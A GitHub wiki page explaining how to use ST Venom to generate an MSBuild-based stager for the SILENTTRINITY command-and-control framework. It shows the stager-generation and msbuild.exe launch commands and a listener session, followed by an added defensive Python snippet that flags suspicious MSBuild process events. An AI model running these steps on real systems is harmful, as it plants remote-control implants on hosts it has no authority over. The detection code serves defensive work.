ST Venom - Th3J0kr/SILENTTRINITY_WIKI GitHub Wiki

Using ST Venom

Generating a stager for SILENTTRINITY with stvenom.py is a piece of cake.

$ python3.7 stvenom.py --help  
usage: stvenom.py [-h] [--ip IP] [--file FILE] stager listener port

positional arguments:
  stager       Stager method
  listener     Listener protocol
  port         Bind Port

optional arguments:
  -h, --help   show this help message and exit
  --ip IP      Bind IP address
  --file FILE  Filename

Example:

$ python3.7 stvenom.py msbuild http 8089 --ip $(ip -4 addr show wlp2s0 | grep -oP '(?<=inet\s)\d+(\.\d+){3}')
[+] Generated stager to msbuild.xml
[*] Launch with 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe msbuild.xml'
[+] Generated resource file: msbuild.res
[*] Launch with 'python3.7 st.py -r msbuild.res'

Start SILENTTRINITY with the generated resource file, which sets up and starts the listener for the stager:

$ python3.7 st.py -r msbuild.res


   _____ ______    _______   __________________  _____   ______________  __
  / ___//  _/ /   / ____/ | / /_  __/_  __/ __ \/  _/ | / /  _/_  __/\ \/ /
  \__ \ / // /   / __/ /  |/ / / /   / / / /_/ // //  |/ // /  / /    \  /
 ___/ // // /___/ /___/ /|  / / /   / / / _, _// // /|  // /  / /     / /
/____/___/_____/_____/_/ |_/ /_/   /_/ /_/ |_/___/_/ |_/___/ /_/     /_/

                         Codename: Ánima
                         Version: 0.0.1dev

ST ≫ listeners
ST (listeners) ≫ use http
ST (listeners)(http) ≫ set BindIP 192.168.1.187
ST (listeners)(http) ≫ set Port 8089
ST (listeners)(http) ≫ start
[+] Listener 'http' started successfully!
ST (listeners)(http) ≫ Running on https://192.168.1.187:8089 (CTRL + C to quit)
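
The launch command printed by stvenom.py above (the .NET Framework msbuild.exe run against msbuild.xml) is what shows up in endpoint process-creation logs. The following is an added example for defenders, not part of the original wiki or of SILENTTRINITY: it triages process-creation events for MSBuild started by an unexpected parent or pointed at a non-build project file. The field names follow Sysmon Event ID 1; the parent and extension allow-lists, the function names and the sample events are assumptions constructed for illustration.

```python
import ntpath
import re

# Assumptions (tune per environment): parents that normally drive MSBuild,
# and the project-file extensions a real build is expected to use.
EXPECTED_PARENTS = {"devenv.exe", "dotnet.exe", "msbuild.exe"}
BUILD_EXTENSIONS = {".sln", ".csproj", ".vbproj", ".vcxproj", ".proj"}
TOKEN = re.compile(r'"([^"]*)"|(\S+)')


def split_cmdline(cmdline):
    """Split a Windows command line into arguments, honouring double quotes."""
    return [quoted or bare for quoted, bare in TOKEN.findall(cmdline)]


def triage(event):
    """Return the reasons a process-creation event warrants review ([] if none)."""
    if ntpath.basename(event["Image"]).lower() != "msbuild.exe":
        return []
    reasons = []
    parent = ntpath.basename(event["ParentImage"]).lower()
    if parent not in EXPECTED_PARENTS:
        reasons.append(f"unexpected parent: {parent}")
    # The first argument that is not a /switch or -switch is the project file.
    args = [a for a in split_cmdline(event["CommandLine"])[1:]
            if a and a[0] not in "/-"]
    if args and ntpath.splitext(args[0])[1].lower() not in BUILD_EXTENSIONS:
        reasons.append(f"non-build project file: {args[0]}")
    return reasons


# Constructed sample events (not real telemetry), Sysmon Event ID 1 field names.
FRAMEWORK = r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe"
SAMPLE_EVENTS = [
    {"Image": FRAMEWORK, "CommandLine": FRAMEWORK + " msbuild.xml",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": FRAMEWORK,
     "CommandLine": '"' + FRAMEWORK + r'" /nologo C:\src\app\app.csproj',
     "ParentImage": r"C:\VS\Common7\IDE\devenv.exe"},
    {"Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe msbuild.xml",
     "ParentImage": r"C:\Windows\explorer.exe"},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(ev["CommandLine"], "->", triage(ev) or "ok")
```

Only the first sample, which matches the command line stvenom.py prints, is flagged; the IDE-driven build and the unrelated process pass.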